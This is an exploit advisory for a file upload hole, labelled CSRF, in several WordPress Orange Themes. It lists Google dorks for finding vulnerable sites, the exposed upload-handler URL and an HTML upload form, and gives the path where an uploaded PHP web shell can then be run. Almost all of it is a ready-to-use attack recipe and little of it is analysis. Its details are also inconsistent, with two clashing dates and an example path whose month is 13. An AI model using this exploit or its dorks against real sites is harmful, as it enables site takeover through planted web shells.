Wordpress Orange Themes CSRF

1. **Title : Wordpress Orange Themes CSRF File Upload Vulnerability
2. **Author : Jje Incovers
3. **Date : 01/12/2013 - 17 November 2013
4. **Category : Web Applications
5. **Type : PHP
6. **Vendor : http://www.orange-themes.com/
7. **Download : http://www.orange-themes.com/portfolio/
8. **Tested : Mozila, Chrome, Opera -> Windows & Linux
9. **Vulnerabillity : CSRF
10. **Dork :
11. inurl:"/wp-content/themes/agritourismo-theme/"
12. inurl:"/wp-content/themes/bordeaux-theme/"
13. inurl:"/wp-content/themes/bulteno-theme/"
14. inurl:"/wp-content/themes/oxygen-theme/"
15. inurl:"/wp-content/themes/radial-theme/"
16. inurl:"/wp-content/themes/rayoflight-theme/"
17. inurl:"/wp-content/themes/reganto-theme/"
18. inurl:"/wp-content/themes/rockstar-theme/"
19.  
20. CSRF File Upload Vulnerability
21.  
22. Exploit & POC :
23.  
24. http://site-target/wp-content/themes/rockstar-theme/functions/upload-handler.php
25.  
26. Script :
27.  
28. <form enctype="multipart/form-data"
29. action="http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php" method="post">
30. Your File: <input name="uploadfile" type="file" /><br />
31. <input type="submit" value="upload" />
32. </form>
33.  
34.  
35. File Access :
36.  
37. http://site-target/wp-content/uploads/[years]/[month]/your_shell.php
38.  
39. Example : http://127.0.0.1/wp-content/uploads/2013/13/inc0vers.php
40.  
41. Note :
42. Script CSRF equate with dork you use